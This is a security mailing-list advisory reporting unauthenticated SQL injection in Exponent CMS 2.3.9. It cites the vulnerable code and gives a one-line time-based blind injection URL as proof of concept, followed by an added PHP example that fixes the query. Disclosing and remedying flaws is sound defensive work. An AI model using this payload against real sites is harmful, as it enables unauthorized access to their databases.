oss-sec mailing list archives

Exponent CMS 2.3.9 SQL injection vulnerabilities


From: east wu <ylgaaaaa () gmail com>
Date: Mon, 19 Sep 2016 13:46:34 +0800

https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L172

The 'is_what' parameter there is injectable without login.


https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expDatabase.php#L559

$this->sql("UPDATE " . $this->prefix . $table . " SET " . $col . "=0 WHERE " . $where);

POC:
/index.php?controller=address&action=activate_address&is_what=address1=(select * from (select sleep(5))x)%23&id=1
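As an added example (not part of the original post and not Exponent CMS code), the quoted "UPDATE prefix.table SET col=0 WHERE where" rebuilt so that the column name can only be one of a fixed allow-list and the row id is bound as a parameter; the table prefix, table name and allowed column names below are hypothetical.

```php
<?php
// Added example, not Exponent CMS code. The column name is checked against an
// allow-list and an identifier pattern before any SQL text is built, and the
// id travels as a bound value instead of being concatenated into the WHERE.
declare(strict_types=1);

/**
 * Build the UPDATE as a prepared-statement string plus its bound parameters.
 * Any $col outside $allowedCols (e.g. the report's
 * "address1=(select * from (select sleep(5))x)#") is refused outright.
 *
 * @return array{0: string, 1: array<string, int>}
 */
function buildResetUpdate(string $prefix, string $table, string $col, int $id, array $allowedCols): array
{
    // Structural identifiers must also match a strict shape, so a mistake in
    // the allow-list itself cannot smuggle punctuation into the statement.
    $ident = '/^[A-Za-z_][A-Za-z0-9_]*$/';
    if (!in_array($col, $allowedCols, true) || !preg_match($ident, $col)) {
        throw new InvalidArgumentException('column not permitted: ' . $col);
    }
    if (!preg_match($ident, $prefix . $table)) {
        throw new InvalidArgumentException('bad table name: ' . $prefix . $table);
    }
    // Identifiers are backtick-quoted (MySQL); the id is a named placeholder.
    $sql = sprintf('UPDATE `%s%s` SET `%s`=0 WHERE id=:id', $prefix, $table, $col);
    return [$sql, [':id' => $id]];
}

// Hypothetical names for the demonstration. With a PDO connection $pdo the
// caller would run: $stmt = $pdo->prepare($sql); $stmt->execute($params);
$allowed = ['is_default', 'is_billing'];
[$sql, $params] = buildResetUpdate('exp_', 'addresses', 'is_default', 1, $allowed);
echo $sql, ' ', json_encode($params), PHP_EOL;

try {
    // The URL-decoded payload from the report never reaches the SQL string.
    buildResetUpdate('exp_', 'addresses', 'address1=(select * from (select sleep(5))x)#', 1, $allowed);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```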
